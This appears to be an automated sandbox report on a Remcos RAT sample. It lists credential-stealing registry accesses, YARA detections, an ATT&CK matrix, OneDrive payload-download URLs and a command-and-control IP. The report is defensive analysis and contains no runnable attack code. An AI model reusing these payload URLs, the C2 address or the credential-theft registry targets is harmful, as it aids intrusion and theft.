Source: C:\Windows\SysWOW64\SndVol.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\SndVol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: ESMTPPassword	7_2_004033F0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	7_2_00402DB3
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	7_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 5480, type: MEMORYSTR

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\SysWOW64\SndVol.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-TLPQMO			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-TLPQMO

Yara detected PrivateLoader

Source: Yara match	File source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Remcos RAT

Source: Yara match	File source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4419622044.000000001E42F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2251261824.0000000003129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2246883380.0000000003129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408561480.0000000003483000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 5900, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: cmd.exe

3_2_0040569A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	111 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 Valid Accounts	1 Bypass User Account Control	2 Obfuscated Files or Information	111 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	1 Windows Service	1 Valid Accounts	1 Software Packing	2 Credentials in Registry	1 System Service Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	11 Access Token Manipulation	1 DLL Side-Loading	3 Credentials In Files	1 System Network Connections Discovery	Distributed Component Object Model	111 Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Windows Service	1 Bypass User Account Control	LSA Secrets	3 File and Directory Discovery	SSH	3 Clipboard Data	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	622 Process Injection	11 Masquerading	Cached Domain Credentials	48 System Information Discovery	VNC	GUI Input Capture	113 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	1 Valid Accounts	DCSync	251 Security Software Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Virtualization/Sandbox Evasion	Proc Filesystem	1 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Access Token Manipulation	/etc/passwd and /etc/shadow	4 Process Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	622 Process Injection	Network Sniffing	1 Application Window Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Owner/User Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
HGTQP09643009.scr.exe	61%	ReversingLabs	Win32.Backdoor.Remcos
HGTQP09643009.scr.exe	60%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\Libraries\Jsqwmpul.PIF	61%	ReversingLabs	Win32.Backdoor.Remcos
C:\Users\Public\Libraries\Jsqwmpul.PIF	60%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
dual-spov-0006.spov-msedge.net	0%	Virustotal	Browse
geoplugin.net	3%	Virustotal	Browse
onedrive.live.com	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.imvu.comr	0%	URL Reputation	safe
http://www.imvu.comr	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	0%	URL Reputation	safe
https://aefd.nelreports.net/api/report?cat=bingaotak	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	100%	URL Reputation	phishing
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://geoplugin.net/json.gp	100%	URL Reputation	phishing
https://aefd.nelreports.net/api/report?cat=bingaot	0%	URL Reputation	safe
https://aefd.nelreports.net/api/report?cat=bingrms	0%	URL Reputation	safe
http://ocsp.sectigo.com0C	0%	URL Reputation	safe
http://www.ebuddy.com	0%	URL Reputation	safe
https://2hhi9w.am.files.1drv.com/y4mGwuSSuFxuDDvpAJ_fbrE3BKuKW5XqcUBzuNsRzBm8cRH2dyNR7edm5BhYh2ZPGwC	0%	Avira URL Cloud	safe
https://onedrive.live.com/download?resid=6D087DEFFAB8CBA7%21222&authkey=	0%	Avira URL Cloud	safe
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P	0%	Avira URL Cloud	safe
107.175.229.139	0%	Avira URL Cloud	safe
https://2hhi9w.am.files.1drv.com/y4mBwd_O0orCZYCB-m72OLd7ovLPprUM4laUDtpNM9mFpZXV0m08RNxiySgMwrezLWp	0%	Avira URL Cloud	safe
http://www.nirsoft.net	0%	Avira URL Cloud	safe
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	0%	Avira URL Cloud	safe
http://www.nirsoft.net	1%	Virustotal		Browse
https://onedrive.live.com/	0%	Avira URL Cloud	safe
https://2hhi9w.am.files.1drv.com/y4mPer_JvrxbylmNPC7e_eDC5k1q6183BqTBthJtctBOaRiGjAhjc2kQZzIhZZ1Vh_Y	0%	Avira URL Cloud	safe
https://www.google.com	0%	Avira URL Cloud	safe
107.175.229.139	17%	Virustotal		Browse
https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073	0%	Avira URL Cloud	safe
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF	0%	Avira URL Cloud	safe
https://live.com/5	0%	Avira URL Cloud	safe
https://onedrive.live.com/	1%	Virustotal		Browse
https://2hhi9w.am.files.1drv.com/gd	0%	Avira URL Cloud	safe
https://maps.windows.com/windows-app-web-link	0%	Avira URL Cloud	safe
https://live.com/	0%	Avira URL Cloud	safe
https://www.google.com	0%	Virustotal		Browse
https://login.yahoo.com/config/login	0%	Avira URL Cloud	safe
http://www.nirsoft.net/	0%	Avira URL Cloud	safe
http://www.imvu.comata	0%	Avira URL Cloud	safe
https://live.com/5	0%	Virustotal		Browse
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF	0%	Virustotal		Browse
https://2hhi9w.am.files.1drv.com/	0%	Avira URL Cloud	safe
https://login.yahoo.com/config/login	0%	Virustotal		Browse
http://geoplugin.net/json.gpY	0%	Avira URL Cloud	safe
https://www.office.com/	0%	Avira URL Cloud	safe
https://maps.windows.com/windows-app-web-link	0%	Virustotal		Browse
http://www.nirsoft.net/	1%	Virustotal		Browse
http://geoplugin.net/json.gph	0%	Avira URL Cloud	safe
https://2hhi9w.am.files.1drv.com:443/y4mGwuSSuFxuDDvpAJ_fbrE3BKuKW5XqcUBzuNsRzBm8cRH2dyNR7edm5BhYh2Z	0%	Avira URL Cloud	safe
https://2hhi9w.am.files.1drv.com/	0%	Virustotal		Browse
https://2hhi9w.am.files.1drv.com/y4mKPtT-rAbG4inW0O2_-07PoRY_sfXHa6qbFlkBszZbmAY1MzHswFDHO6u63PruOhI	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpY	0%	Virustotal		Browse
https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e	0%	Avira URL Cloud	safe
http://www.imvu.com	0%	Avira URL Cloud	safe
https://www.office.com/	0%	Virustotal		Browse
http://geoplugin.net/json.gph	0%	Virustotal		Browse
https://2hhi9w.am.files.1drv.com/y4mGwuSSuFxuDDvpAJ_fbrE3L	0%	Avira URL Cloud	safe
https://2hhi9w.am.files.1drv.com/y4mGwuSSuFxuDDvpAJ_fbrE3LL	0%	Avira URL Cloud	safe
https://live.com/	0%	Virustotal		Browse
https://2hhi9w.am.files.1drv.com:443/y4mBwd_O0orCZYCB-m72OLd7ovLPprUM4laUDtpNM9mFpZXV0m08RNxiySgMwre	0%	Avira URL Cloud	safe
https://www.google.com/accounts/servicelogin	0%	Avira URL Cloud	safe
http://www.pmail.com	0%	Avira URL Cloud	safe
http://www.imvu.com	0%	Virustotal		Browse
https://2hhi9w.am.files.1drv.com:443/y4mPer_JvrxbylmNPC7e_eDC5k1q6183BqTBthJtctBOaRiGjAhjc2kQZzIhZZ1	0%	Avira URL Cloud	safe
https://onedrive.live.com/downlo	0%	Avira URL Cloud	safe
https://www.google.com/accounts/servicelogin	0%	Virustotal		Browse
https://onedrive.live.com/downlo	0%	Virustotal		Browse
http://www.pmail.com	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dual-spov-0006.spov-msedge.net	13.107.139.11	true	true	0%, Virustotal, Browse	unknown
geoplugin.net	178.237.33.50	true	false	3%, Virustotal, Browse	unknown
onedrive.live.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
2hhi9w.am.files.1drv.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
107.175.229.139	true	17%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gp	true	URL Reputation: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P	bhv3259.tmp.4.dr	false	Avira URL Cloud: safe	unknown
https://2hhi9w.am.files.1drv.com/y4mBwd_O0orCZYCB-m72OLd7ovLPprUM4laUDtpNM9mFpZXV0m08RNxiySgMwrezLWp	HGTQP09643009.scr.exe, 00000000.00000002.2002800587.0000000000803000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.imvu.comr	SndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/download?resid=6D087DEFFAB8CBA7%21222&authkey=	Jsqwmpul.PIF, 0000000C.00000002.2281075353.000000002C5A0000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://2hhi9w.am.files.1drv.com/y4mGwuSSuFxuDDvpAJ_fbrE3BKuKW5XqcUBzuNsRzBm8cRH2dyNR7edm5BhYh2ZPGwC	Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.net	SndVol.exe, 00000004.00000002.2047760751.0000000000963000.00000004.00000010.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://2hhi9w.am.files.1drv.com/gd	Jsqwmpul.PIF, 00000009.00000002.2160077550.000000000078E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aefd.nelreports.net/api/report?cat=bingaotak	bhv3259.tmp.4.dr	false	URL Reputation: safe	unknown
https://deff.nelreports.net/api/report?cat=msn	bhv3259.tmp.4.dr	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	SndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com/	HGTQP09643009.scr.exe, 00000000.00000002.2002800587.00000000007B0000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 00000009.00000002.2160077550.000000000072F000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 0000000C.00000002.2251582423.00000000008E7000.00000004.00000020.00020000.00000000.sdmp	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://2hhi9w.am.files.1drv.com/y4mPer_JvrxbylmNPC7e_eDC5k1q6183BqTBthJtctBOaRiGjAhjc2kQZzIhZZ1Vh_Y	Jsqwmpul.PIF, 00000009.00000002.2160077550.000000000078E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com	SndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073	bhv3259.tmp.4.dr	false	Avira URL Cloud: safe	unknown
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF	bhv3259.tmp.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://live.com/5	HGTQP09643009.scr.exe, 00000000.00000002.2002800587.0000000000803000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gp/C	SndVol.exe, 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp	true	URL Reputation: phishing	unknown
https://maps.windows.com/windows-app-web-link	bhv3259.tmp.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://live.com/	Jsqwmpul.PIF, 00000009.00000002.2160077550.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000905000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://login.yahoo.com/config/login	SndVol.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.nirsoft.net/	SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.imvu.comata	SndVol.exe, 00000008.00000002.2033248521.000000000322D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://2hhi9w.am.files.1drv.com/	HGTQP09643009.scr.exe, 00000000.00000002.2002800587.0000000000803000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gpY	SndVol.exe, 00000003.00000003.2050939936.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2022947923.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000002.4408617814.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2299239501.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2051064837.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2017852244.00000000034BE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/	bhv3259.tmp.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gph	SndVol.exe, 00000003.00000003.2019710060.00000000034F9000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://2hhi9w.am.files.1drv.com:443/y4mGwuSSuFxuDDvpAJ_fbrE3BKuKW5XqcUBzuNsRzBm8cRH2dyNR7edm5BhYh2Z	Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://2hhi9w.am.files.1drv.com/y4mKPtT-rAbG4inW0O2_-07PoRY_sfXHa6qbFlkBszZbmAY1MzHswFDHO6u63PruOhI	Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e	bhv3259.tmp.4.dr	false	Avira URL Cloud: safe	unknown
http://www.imvu.com	SndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2033248521.000000000322D000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://2hhi9w.am.files.1drv.com/y4mGwuSSuFxuDDvpAJ_fbrE3L	Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://2hhi9w.am.files.1drv.com/y4mGwuSSuFxuDDvpAJ_fbrE3LL	Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aefd.nelreports.net/api/report?cat=bingaot	bhv3259.tmp.4.dr	false	URL Reputation: safe	unknown
https://2hhi9w.am.files.1drv.com:443/y4mBwd_O0orCZYCB-m72OLd7ovLPprUM4laUDtpNM9mFpZXV0m08RNxiySgMwre	HGTQP09643009.scr.exe, 00000000.00000002.2002800587.0000000000803000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aefd.nelreports.net/api/report?cat=bingrms	bhv3259.tmp.4.dr	false	URL Reputation: safe	unknown
https://www.google.com/accounts/servicelogin	SndVol.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.pmail.com	HGTQP09643009.scr.exe, 00000000.00000002.2033128865.000000007FCE9000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2003278216.00000000022E2000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0C	HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://2hhi9w.am.files.1drv.com:443/y4mPer_JvrxbylmNPC7e_eDC5k1q6183BqTBthJtctBOaRiGjAhjc2kQZzIhZZ1	Jsqwmpul.PIF, 00000009.00000002.2160077550.000000000078E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
